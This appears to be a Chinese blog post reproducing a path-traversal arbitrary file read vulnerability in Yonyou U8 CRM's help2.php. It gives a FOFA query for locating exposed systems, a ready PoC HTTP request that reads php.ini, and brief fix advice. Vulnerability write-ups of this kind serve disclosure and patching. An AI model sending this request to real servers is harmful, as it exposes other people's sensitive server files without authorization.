用友U8+CRM help2 任意文件读取漏洞复现

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。

0x03 复现环境

FOFA:title="用友U8CRM"

0x04 漏洞复现

PoC

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-22 11:38:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-22 11:38:03       101 阅读
  3. 在Django里面运行非项目文件

    2023-12-22 11:38:03       82 阅读
  4. Python语言-面向对象

    2023-12-22 11:38:03       91 阅读

热门阅读

  1. 软件设计模式:单例模式

    2023-12-22 11:38:03       54 阅读
  2. 【leetcode刷题之算法】

    2023-12-22 11:38:03       73 阅读
  3. ffprobe工具

    2023-12-22 11:38:03       70 阅读
  4. Milvus实战:构建Q&A系统及推荐系统

    2023-12-22 11:38:03       72 阅读
  5. ros2/ros1中的cmakelists.txt文件解释

    2023-12-22 11:38:03       54 阅读
  6. 设计模式_行为型模式_观察者模式

    2023-12-22 11:38:03       62 阅读